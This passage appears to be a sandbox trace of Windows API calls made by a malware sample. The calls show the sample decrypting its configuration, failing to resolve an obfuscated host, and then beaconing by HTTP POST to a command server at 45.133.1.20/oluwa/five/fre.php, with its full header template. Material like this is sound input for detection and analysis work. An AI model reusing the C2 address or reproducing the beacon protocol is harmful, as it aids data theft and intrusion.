(lpLibFileName="shlwapi") returned 0x77680000 [0313.864] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0313.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.865] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0313.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.866] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0313.866] GetProcessHeap () returned 0x6a0000 [0313.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0313.866] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0313.867] GetProcessHeap () returned 0x6a0000 [0313.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0313.867] GetProcessHeap () returned 0x6a0000 [0313.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0313.867] GetProcessHeap () returned 0x6a0000 [0313.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0313.868] GetProcessHeap () returned 0x6a0000 [0313.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0313.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.871] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.877] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0313.940] GetProcessHeap () returned 0x6a0000 [0313.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0313.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.942] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0313.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.943] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.947] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.947] GetProcessHeap () returned 0x6a0000 [0313.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0313.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.949] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0313.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.952] CryptDestroyKey (hKey=0x6ad520) returned 1 [0313.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.954] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0313.954] GetProcessHeap () returned 0x6a0000 [0313.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0313.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.955] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0313.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.959] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0313.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.960] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0313.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.962] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0313.962] GetProcessHeap () returned 0x6a0000 [0313.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0313.962] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0313.962] GetProcessHeap () returned 0x6a0000 [0313.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0313.962] socket (af=2, type=1, protocol=6) returned 0xc04 [0313.963] connect (s=0xc04, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0313.989] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0313.989] GetProcessHeap () returned 0x6a0000 [0313.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0313.989] GetProcessHeap () returned 0x6a0000 [0313.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0313.991] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.993] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0313.993] GetProcessHeap () returned 0x6a0000 [0313.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df928 [0313.993] GetProcessHeap () returned 0x6a0000 [0313.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0313.994] GetProcessHeap () returned 0x6a0000 [0313.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0313.994] GetProcessHeap () returned 0x6a0000 [0313.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0313.995] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.995] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0313.996] GetProcessHeap () returned 0x6a0000 [0313.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0313.996] GetProcessHeap () returned 0x6a0000 [0313.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0313.996] send (s=0xc04, buf=0x6bd460*, len=242, flags=0) returned 242 [0313.997] send (s=0xc04, buf=0x6bb998*, len=159, flags=0) returned 159 [0313.997] GetProcessHeap () returned 0x6a0000 [0313.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0313.997] recv (in: s=0xc04, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0314.123] GetProcessHeap () returned 0x6a0000 [0314.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0314.125] GetProcessHeap () returned 0x6a0000 [0314.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0314.125] GetProcessHeap () returned 0x6a0000 [0314.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df928 | out: hHeap=0x6a0000) returned 1 [0314.126] GetProcessHeap () returned 0x6a0000 [0314.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0314.127] closesocket (s=0xc04) returned 0 [0314.128] GetProcessHeap () returned 0x6a0000 [0314.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0314.128] GetProcessHeap () returned 0x6a0000 [0314.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0314.129] GetProcessHeap () returned 0x6a0000 [0314.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0314.129] GetProcessHeap () returned 0x6a0000 [0314.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0314.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1940) returned 0xc04 [0314.136] Sleep (dwMilliseconds=0xea60) [0314.138] GetProcessHeap () returned 0x6a0000 [0314.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0314.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.140] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.150] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0314.201] GetProcessHeap () returned 0x6a0000 [0314.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0314.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.202] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0314.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.204] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.205] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.205] GetProcessHeap () returned 0x6a0000 [0314.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0314.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.210] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0314.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.211] CryptDestroyKey (hKey=0x6ad060) returned 1 [0314.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.212] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0314.212] GetProcessHeap () returned 0x6a0000 [0314.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0314.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.214] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0314.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.215] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0314.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.216] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0314.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.218] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0314.218] GetProcessHeap () returned 0x6a0000 [0314.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0314.218] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0314.218] GetProcessHeap () returned 0x6a0000 [0314.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0314.219] GetProcessHeap () returned 0x6a0000 [0314.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0314.219] GetProcessHeap () returned 0x6a0000 [0314.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0314.219] GetProcessHeap () returned 0x6a0000 [0314.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0314.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.224] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0314.243] GetProcessHeap () returned 0x6a0000 [0314.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0314.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.247] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0314.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.248] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.250] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.250] GetProcessHeap () returned 0x6a0000 [0314.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0314.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.276] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0314.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.277] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0314.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.278] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0314.278] GetProcessHeap () returned 0x6a0000 [0314.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0314.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.279] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0314.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.281] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0314.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.282] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0314.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.283] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0314.283] GetProcessHeap () returned 0x6a0000 [0314.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0314.284] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0314.284] GetProcessHeap () returned 0x6a0000 [0314.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0314.284] socket (af=2, type=1, protocol=6) returned 0xc08 [0314.284] connect (s=0xc08, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0314.534] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0314.534] GetProcessHeap () returned 0x6a0000 [0314.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0314.534] GetProcessHeap () returned 0x6a0000 [0314.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0314.535] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.536] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0314.536] GetProcessHeap () returned 0x6a0000 [0314.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df0e8 [0314.536] GetProcessHeap () returned 0x6a0000 [0314.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0314.537] GetProcessHeap () returned 0x6a0000 [0314.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0314.537] GetProcessHeap () returned 0x6a0000 [0314.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0314.538] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.539] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0314.539] GetProcessHeap () returned 0x6a0000 [0314.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0314.539] GetProcessHeap () returned 0x6a0000 [0314.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0314.540] send (s=0xc08, buf=0x6bd460*, len=242, flags=0) returned 242 [0314.541] send (s=0xc08, buf=0x6bb998*, len=159, flags=0) returned 159 [0314.541] GetProcessHeap () returned 0x6a0000 [0314.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0314.541] recv (in: s=0xc08, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0314.612] GetProcessHeap () returned 0x6a0000 [0314.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0314.615] GetProcessHeap () returned 0x6a0000 [0314.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0314.617] GetProcessHeap () returned 0x6a0000 [0314.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df0e8 | out: hHeap=0x6a0000) returned 1 [0314.618] GetProcessHeap () returned 0x6a0000 [0314.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0314.618] closesocket (s=0xc08) returned 0 [0314.619] GetProcessHeap () returned 0x6a0000 [0314.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0314.619] GetProcessHeap () returned 0x6a0000 [0314.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0314.619] GetProcessHeap () returned 0x6a0000 [0314.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0314.620] GetProcessHeap () returned 0x6a0000 [0314.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0314.624] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1944) returned 0xc08 [0314.628] Sleep (dwMilliseconds=0xea60) [0314.630] GetProcessHeap () returned 0x6a0000 [0314.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0314.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.631] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.642] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0314.653] GetProcessHeap () returned 0x6a0000 [0314.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0314.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.664] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0314.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.665] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.666] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.666] GetProcessHeap () returned 0x6a0000 [0314.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0314.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.668] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0314.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.669] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0314.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.673] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0314.673] GetProcessHeap () returned 0x6a0000 [0314.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0314.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.674] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0314.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.675] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0314.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.676] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0314.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.677] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0314.677] GetProcessHeap () returned 0x6a0000 [0314.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 